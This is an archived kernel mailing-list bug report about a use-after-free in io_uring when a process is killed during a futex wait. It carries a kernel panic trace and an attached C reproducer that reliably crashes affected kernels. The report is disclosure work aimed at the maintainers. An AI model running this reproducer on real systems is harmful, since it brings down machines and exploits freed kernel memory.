public inbox for io-uring@vger.kernel.org
 help / color / mirror / Atom feed
From: rtm@csail.mit.edu
To: Jens Axboe <axboe@kernel.dk>,
	Pavel Begunkov <asml.silence@gmail.com>,
	io-uring@vger.kernel.org
Subject: use-after-free if killed while in IORING_OP_FUTEX_WAIT
Date: Wed, 04 Jun 2025 09:58:02 -0400	[thread overview]
Message-ID: <38053.1749045482@localhost> (raw)

[-- Attachment #1: Type: text/plain, Size: 2033 bytes --]

If a process is killed while in IORING_OP_FUTEX_WAIT, do_exit()'s call
to exit_mm() causes the futex_private_hash to be freed, along with its
buckets' locks, while the io_uring request still exists. When (a little
later in do_exit()) the io_uring fd is released via fput(), the resulting
futex_unqueue() tries to use the freed memory that
req->async_data->lock_ptr points to.

I've attached a demo:

# cc uring46b.c
# ./a.out
killing child
BUG: spinlock bad magic on CPU#0, kworker/u4:1/26
Unable to handle kernel paging request at virtual address 6b6b6b6b6b6b711b
Current kworker/u4:1 pgtable: 4K pagesize, 39-bit VAs, pgdp=0x000000008202a000
[6b6b6b6b6b6b711b] pgd=0000000000000000, p4d=0000000000000000, pud=0000000000000000
Oops [#1]
Modules linked in:
CPU: 0 UID: 0 PID: 26 Comm: kworker/u4:1 Not tainted 6.15.0-11192-ga82d78bc13a8 #553 NONE 
Hardware name: riscv-virtio,qemu (DT)
Workqueue: iou_exit io_ring_exit_work
epc : spin_dump+0x38/0x6e
 ra : spin_dump+0x30/0x6e
epc : ffffffff80003354 ra : ffffffff8000334c sp : ffffffc600113b60
...
status: 0000000200000120 badaddr: 6b6b6b6b6b6b711b cause: 000000000000000d
[<ffffffff80003354>] spin_dump+0x38/0x6e
[<ffffffff8009b78a>] do_raw_spin_lock+0x10a/0x126
[<ffffffff811e6552>] _raw_spin_lock+0x1a/0x22
[<ffffffff800eb80c>] futex_unqueue+0x2a/0x76
[<ffffffff8069e366>] __io_futex_cancel+0x72/0x88
[<ffffffff806982fe>] io_cancel_remove_all+0x50/0x74
[<ffffffff8069e4ac>] io_futex_remove_all+0x1a/0x22
[<ffffffff80010a7e>] io_uring_try_cancel_requests+0x2e2/0x36e
[<ffffffff80010bf6>] io_ring_exit_work+0xec/0x3f0
[<ffffffff80057f0a>] process_one_work+0x132/0x2fe
[<ffffffff8005888c>] worker_thread+0x21e/0x2fe
[<ffffffff80060428>] kthread+0xe8/0x1ba
[<ffffffff80022fb0>] ret_from_fork_kernel+0xe/0x5e
[<ffffffff811e8566>] ret_from_fork_kernel_asm+0x16/0x18
Code: 4517 018b 0513 ca05 00ef 3b60 2603 0049 2601 c491 (a703) 5b04 
---[ end trace 0000000000000000 ]---
Kernel panic - not syncing: Fatal exception
---[ end Kernel panic - not syncing: Fatal exception ]---

Robert Morris
rtm@mit.edu


[-- Attachment #2: uring46b.c --]
[-- Type: application/octet-stream, Size: 6211 bytes --]

#include <stdio.h>
#include <signal.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sys/uio.h>
#include <linux/fs.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <linux/io_uring.h>

int dirfd = -1;
int pfds[2];
int sock = -1;

//
// adapted from:
// https://unixism.net/loti/low_level.html
// https://github.com/shuveb/io_uring-by-example
//

/* Number of entries requested from io_uring_setup() in app_setup_uring(). */
#define QUEUE_DEPTH 1
/* Size and alignment of each buffer allocated in submit_to_sq(). */
#define BLOCK_SZ    1024

/*
 * Pointers into the mapped submission-queue ring. app_setup_uring() sets
 * each field to the SQ ring mapping base plus the matching offset from
 * io_uring_params.sq_off.
 */
struct app_io_sq_ring {
    unsigned *head;          /* base + sq_off.head */
    unsigned *tail;          /* base + sq_off.tail; advanced by submit_to_sq() */
    unsigned *ring_mask;     /* base + sq_off.ring_mask; masks tail into a slot index */
    unsigned *ring_entries;  /* base + sq_off.ring_entries */
    unsigned *flags;         /* base + sq_off.flags */
    unsigned *array;         /* base + sq_off.array; slot -> SQE index table */
};

/*
 * Pointers into the mapped completion-queue ring. app_setup_uring() sets
 * each field to the CQ ring mapping base plus the matching offset from
 * io_uring_params.cq_off. The visible code never reads completions
 * through these pointers.
 */
struct app_io_cq_ring {
    unsigned *head;              /* base + cq_off.head */
    unsigned *tail;              /* base + cq_off.tail */
    unsigned *ring_mask;         /* base + cq_off.ring_mask */
    unsigned *ring_entries;      /* base + cq_off.ring_entries */
    struct io_uring_cqe *cqes;   /* base + cq_off.cqes */
};

/*
 * Everything the program keeps about one io_uring instance; populated by
 * app_setup_uring() and consumed by submit_to_sq().
 */
struct submitter {
    int ring_fd;                     /* descriptor returned by io_uring_setup() */
    struct app_io_sq_ring sq_ring;   /* pointers into the SQ ring mapping */
    struct io_uring_sqe *sqes;       /* SQE array mapped at IORING_OFF_SQES */
    struct app_io_cq_ring cq_ring;   /* pointers into the CQ ring mapping */
};

/*
 * A size plus a trailing flexible array of iovecs. In the visible code
 * only submit_to_sq() uses it: it allocates one and fills in the iovecs,
 * but never attaches them to a request.
 */
struct file_info {
    off_t file_sz;              /* set to the hard-coded size used by submit_to_sq() */
    struct iovec iovecs[];      /* Referred by readv/writev */
};

/*
 * Invoke the io_uring_setup system call directly through syscall().
 *
 * entries and p are passed through unchanged; the syscall() result is
 * narrowed to int and returned as-is.
 */
int io_uring_setup(unsigned entries, struct io_uring_params *p)
{
    long rc = syscall(__NR_io_uring_setup, entries, p);

    return (int) rc;
}

/*
 * Invoke the io_uring_enter system call directly through syscall().
 *
 * The four parameters are forwarded unchanged; the two trailing syscall
 * arguments are always NULL and 0. The syscall() result is narrowed to
 * int and returned as-is.
 */
int io_uring_enter(int ring_fd, unsigned int to_submit,
                          unsigned int min_complete, unsigned int flags)
{
    long rc = syscall(__NR_io_uring_enter, ring_fd, to_submit,
                      min_complete, flags, NULL, 0);

    return (int) rc;
}

/*
 * Create an io_uring instance with QUEUE_DEPTH entries and map its
 * submission ring, completion ring and SQE array into this process.
 *
 * On success s->ring_fd holds the ring descriptor, s->sq_ring and
 * s->cq_ring point at the ring fields located through the offsets the
 * kernel reported in io_uring_params, and s->sqes points at the SQE array.
 *
 * Returns 0 on success and 1 on failure. On failure a diagnostic is
 * printed with perror(), every mapping created so far is unmapped, the
 * ring descriptor is closed and s->ring_fd is reset to -1; the ring
 * pointers in *s are left untouched.
 */
int app_setup_uring(struct submitter *s) {
    struct app_io_sq_ring *sring = &s->sq_ring;
    struct app_io_cq_ring *cring = &s->cq_ring;
    struct io_uring_params p;
    /* char * bases keep the offset arithmetic below standard C;
     * arithmetic on void * is a compiler extension. */
    char *sq_ptr, *cq_ptr;
    size_t sring_sz, cring_sz;
    void *map;

    memset(&p, 0, sizeof(p));
    s->ring_fd = io_uring_setup(QUEUE_DEPTH, &p);
    if (s->ring_fd < 0) {
        perror("io_uring_setup");
        return 1;
    }

    sring_sz = p.sq_off.array + p.sq_entries * sizeof(unsigned);
    cring_sz = p.cq_off.cqes + p.cq_entries * sizeof(struct io_uring_cqe);

    /* With a single shared mapping, one region must be large enough for
     * both rings. */
    if (p.features & IORING_FEAT_SINGLE_MMAP) {
        if (cring_sz > sring_sz) {
            sring_sz = cring_sz;
        }
        cring_sz = sring_sz;
    }

    map = mmap(NULL, sring_sz, PROT_READ | PROT_WRITE,
            MAP_SHARED | MAP_POPULATE,
            s->ring_fd, IORING_OFF_SQ_RING);
    if (map == MAP_FAILED) {
        perror("mmap");
        goto err_close;
    }
    sq_ptr = map;

    if (p.features & IORING_FEAT_SINGLE_MMAP) {
        cq_ptr = sq_ptr;
    } else {
        map = mmap(NULL, cring_sz, PROT_READ | PROT_WRITE,
                MAP_SHARED | MAP_POPULATE,
                s->ring_fd, IORING_OFF_CQ_RING);
        if (map == MAP_FAILED) {
            perror("mmap");
            goto err_unmap_sq;
        }
        cq_ptr = map;
    }

    map = mmap(NULL, p.sq_entries * sizeof(struct io_uring_sqe),
            PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE,
            s->ring_fd, IORING_OFF_SQES);
    if (map == MAP_FAILED) {
        perror("mmap");
        goto err_unmap_cq;
    }

    /* All mappings succeeded: only now publish pointers into *s, so a
     * failed setup never leaves pointers to unmapped memory behind. */
    s->sqes = map;

    sring->head = (unsigned *)(sq_ptr + p.sq_off.head);
    sring->tail = (unsigned *)(sq_ptr + p.sq_off.tail);
    sring->ring_mask = (unsigned *)(sq_ptr + p.sq_off.ring_mask);
    sring->ring_entries = (unsigned *)(sq_ptr + p.sq_off.ring_entries);
    sring->flags = (unsigned *)(sq_ptr + p.sq_off.flags);
    sring->array = (unsigned *)(sq_ptr + p.sq_off.array);

    cring->head = (unsigned *)(cq_ptr + p.cq_off.head);
    cring->tail = (unsigned *)(cq_ptr + p.cq_off.tail);
    cring->ring_mask = (unsigned *)(cq_ptr + p.cq_off.ring_mask);
    cring->ring_entries = (unsigned *)(cq_ptr + p.cq_off.ring_entries);
    cring->cqes = (struct io_uring_cqe *)(cq_ptr + p.cq_off.cqes);

    return 0;

    /* perror() has already run at each failure site, so the cleanup calls
     * below cannot clobber the errno that was reported. */
err_unmap_cq:
    if (cq_ptr != sq_ptr) {
        munmap(cq_ptr, cring_sz);
    }
err_unmap_sq:
    munmap(sq_ptr, sring_sz);
err_close:
    close(s->ring_fd);
    s->ring_fd = -1;
    return 1;
}

/*
 * Queue a single IORING_OP_FUTEX_WAIT request on the ring described by s
 * and call io_uring_enter() asking to submit one entry and wait for one
 * completion.
 *
 * file_path is opened read-only, but the resulting descriptor is not used
 * by the request and is never closed. The file_info / iovec buffers built
 * below are likewise never attached to the SQE and never freed.
 * NOTE(review): these look like leftovers from the readv example this was
 * adapted from — confirm before removing anything, since this is a bug
 * reproducer and its exact behavior matters.
 *
 * Returns 0 if io_uring_enter() succeeds, 1 on any failure.
 */
int submit_to_sq(char *file_path, struct submitter *s) {
    struct file_info *fi;

    /* Opened only as an existence check in effect; file_fd is not used again. */
    int file_fd = open(file_path, O_RDONLY);
    if (file_fd < 0 ) {
        perror("open");
        return 1;
    }

    struct app_io_sq_ring *sring = &s->sq_ring;
    unsigned index = 0, current_block = 0, tail = 0, next_tail = 0;

    /* The size is hard-coded; the file is never stat'ed or read. */
    off_t file_sz = 2;
    off_t bytes_remaining = file_sz;
    int blocks = (int) file_sz / BLOCK_SZ;
    if (file_sz % BLOCK_SZ) blocks++;

    fi = malloc(sizeof(*fi) + sizeof(struct iovec) * blocks);
    if (!fi) {
        fprintf(stderr, "Unable to allocate memory\n");
        return 1;
    }
    fi->file_sz = file_sz;

    /* Allocate one BLOCK_SZ-aligned buffer per block and record it in the
     * iovec array. Nothing below consumes these iovecs. */
    while (bytes_remaining) {
        off_t bytes_to_read = bytes_remaining;
        if (bytes_to_read > BLOCK_SZ)
            bytes_to_read = BLOCK_SZ;

        fi->iovecs[current_block].iov_len = bytes_to_read;

        void *buf;
        if( posix_memalign(&buf, BLOCK_SZ, BLOCK_SZ)) {
            perror("posix_memalign");
            return 1;
        }
        fi->iovecs[current_block].iov_base = buf;

        current_block++;
        bytes_remaining -= bytes_to_read;
    }

    /* Claim the slot at the current tail and point the SQ array entry at
     * the SQE with the same index. */
    next_tail = tail = *sring->tail;
    next_tail++;
    index = tail & *s->sq_ring.ring_mask;
    struct io_uring_sqe *sqe = &s->sqes[index];
    sqe->flags = 0;
    /* NOTE(review): for futex requests `off` presumably aliases the
     * expected futex value (addr2) — confirm against <linux/io_uring.h>. */
    sqe->off = 0;
    sring->array[index] = index;
    tail = next_tail;

    sqe->len = 0;
    /* NOTE(review): `optval` presumably shares storage with addr3, which
     * futex requests appear to use as the wait mask — confirm. */
    sqe->optval = 0x80000000;

    /* The futex word lives in a static buffer: all bytes are set to 0xff,
     * then the first sizeof(long) bytes are overwritten.
     * NOTE(review): this stores through a long * into a char array
     * (type-punning, alignment not guaranteed by the declaration). On a
     * little-endian target with 64-bit long the first four bytes would
     * become zero — confirm that is the intended futex value. */
    static char buf[32];
    memset(buf, 0xff, sizeof(buf));
    *(long*)buf = 0xffffffff00000000;
    sqe->addr = (__u64) buf;

    sqe->opcode = IORING_OP_FUTEX_WAIT;
    /* Replaces the flags = 0 stored above.
     * NOTE(review): 2 presumably corresponds to IOSQE_IO_DRAIN — confirm. */
    sqe->flags = 2;
    /* NOTE(review): for futex requests this field presumably carries
     * futex2 flags rather than a descriptor (130 == 0x82) — confirm. */
    sqe->fd = 130;

    /* Publish the new tail so the kernel sees the SQE.
     * NOTE(review): this is a plain store with no explicit memory barrier —
     * confirm that is acceptable here. */
    if(*sring->tail != tail) {
        *sring->tail = tail;
    }

    /* Submit one entry and wait for at least one completion. */
    int ret =  io_uring_enter(s->ring_fd, 1,1,
            IORING_ENTER_GETEVENTS);
    if(ret < 0) {
        perror("io_uring_enter");
        return 1;
    }

    return 0;
}

/*
 * Reproducer driver.
 *
 * Disables core dumps, (re)creates the file "z", then forks. The child
 * opens a few unrelated descriptors, sets up an io_uring instance and
 * calls submit_to_sq(), which submits a futex wait and asks
 * io_uring_enter() for one completion. After one second the parent sends
 * SIGKILL to the child and lingers briefly before exiting.
 *
 * Returns 0 normally, or 1 if fork() fails.
 */
int
main(void)
{
  struct rlimit r;
  r.rlim_cur = r.rlim_max = 0;
  setrlimit(RLIMIT_CORE, &r);

  unlink("z");
  system("echo hi > z");

  pid_t pid = fork();
  if(pid < 0){
    /* Must not fall through: kill(-1, SIGKILL) would signal every
     * process this user is permitted to signal. */
    perror("fork");
    return 1;
  }
  if(pid == 0){
    struct submitter *s;

    dirfd = open(".", 0);

    socketpair(AF_UNIX, SOCK_STREAM, 0, pfds);
    write(pfds[0], "a", 1);
    write(pfds[1], "b", 1);

    sock = socket(AF_INET, SOCK_DGRAM, 0);

    s = malloc(sizeof(*s));
    if (!s) {
      perror("malloc");
      exit(0);
    }
    memset(s, 0, sizeof(*s));

    if(app_setup_uring(s)) {
      fprintf(stderr, "Unable to setup uring!\n");
      exit(0);
    }

    if(submit_to_sq("z", s)) {
      fprintf(stderr, "Error reading file z\n");
      exit(0);
    }

    /* Only reached if io_uring_enter() returns before the parent's kill. */
    printf("child exiting\n");
    exit(0);
  }

  /* Give the child time to get into the futex wait before killing it. */
  sleep(1);
  printf("killing child\n");
  kill(pid, SIGKILL);
  /* Linger so the kernel-side teardown can run while this process is alive. */
  usleep(200000);
  return 0;
}

             reply	other threads:[~2025-06-04 14:10 UTC|newest]

Thread overview: 3+ messages / expand[flat|nested]  mbox.gz  Atom feed  top
2025-06-04 13:58 rtm [this message]
2025-06-04 14:12 ` use-after-free if killed while in IORING_OP_FUTEX_WAIT Jens Axboe
2025-06-04 16:22   ` Jens Axboe

Reply instructions:

You may reply publicly to this message via plain-text email
using any one of the following methods:

* Save the following mbox file, import it into your mail client,
  and reply-to-all from there: mbox

  Avoid top-posting and favor interleaved quoting:
  https://en.wikipedia.org/wiki/Posting_style#Interleaved_style

* Reply using the --to, --cc, and --in-reply-to
  switches of git-send-email(1):

  git send-email \
    --in-reply-to=38053.1749045482@localhost \
    --to=rtm@csail.mit.edu \
    --cc=asml.silence@gmail.com \
    --cc=axboe@kernel.dk \
    --cc=io-uring@vger.kernel.org \
    /path/to/YOUR_REPLY

  https://kernel.org/pub/software/scm/git/docs/git-send-email.html

* If your mail client supports setting the In-Reply-To header
  via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line before the message body.
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox